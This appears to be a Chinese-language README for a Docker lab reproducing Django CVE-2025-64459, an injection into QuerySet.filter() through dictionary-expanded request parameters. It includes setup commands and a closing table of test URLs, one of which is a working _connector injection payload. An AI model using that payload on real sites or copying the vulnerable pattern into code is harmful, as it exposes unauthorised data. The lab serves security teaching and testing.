一个自包含的 Django CVE-2025-64459 测试平台。演示通过字典展开(dictionary expansion)进行的 QuerySet.filter() 参数注入,使用 Docker。
CVE-2025-64459 是 Django 中一个高严重性漏洞(特指版本 < 5.1.14),当用户输入通过字典展开(例如 **request.GET)直接传递给 QuerySet.filter() 时,允许参数注入。
攻击者可以注入内部参数如 _connector 来操纵查询逻辑(例如将 AND 改为 OR),从而可能绕过过滤器并访问未授权数据。
如果你已安装 Vulnerable Target CLI 或想从源码运行:
克隆 Vulnerable Target 仓库:
git clone https://github.com/HappyHackingSpace/vulnerable-target
cd vulnerable-target
使用 ID 运行实验:
go run cmd/vt/main.go start --id vt-2025-64459
轰!
使用 Nuclei
本仓库仅供教育和研究目的使用。请勿在你不拥有或未经明确许可的系统上使用。作者不对任何滥用此信息的行为负责。
| 描述 | 链接 |
|---|
| 显示全部(空搜索) | /? |
| 正常搜索 | /?title__icontains=Public |
| 漏洞利用尝试(Private) | /?status=private&title__icontains=Area |
| _connector 利用(CVE-2025-64459) | /?_connector=OR 1=1 OR&title__icontains=Public |